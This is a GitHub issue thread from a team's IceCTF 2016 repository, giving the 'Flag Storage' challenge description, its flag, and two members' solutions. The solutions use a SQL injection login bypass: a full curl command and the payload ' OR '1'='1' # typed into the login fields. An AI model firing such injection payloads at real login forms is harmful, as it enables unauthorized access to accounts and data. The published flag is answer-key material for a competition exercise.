search

DeadpoolAndObjectOrientedProgramming / icectf-2016

IceCTF 2016 repo
0 stars 0 forks source link

Stage 2 - Flag Storage #17

Closed koddsson closed 8 years ago

koddsson commented 8 years ago

Description

What a cheat, I was promised a flag and I can't even log in. Can you get in for me? flagstorage.vuln.icec.tf. They seem to hash their passwords, but I think the problem is somehow related to this.

Solution

Flag is: IceCTF{why_would_you_even_do_anything_client_side}

koddsson commented 8 years ago

I cURL with the following command: curl 'http://flagstorage.vuln.icec.tf/login.php' --data "username=koddsson&password_plain=password&password=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855' OR '1'='1"

stebbib commented 8 years ago

damn didn't notice this was done

is just put ' OR '1'='1' # in both fields and got access :v: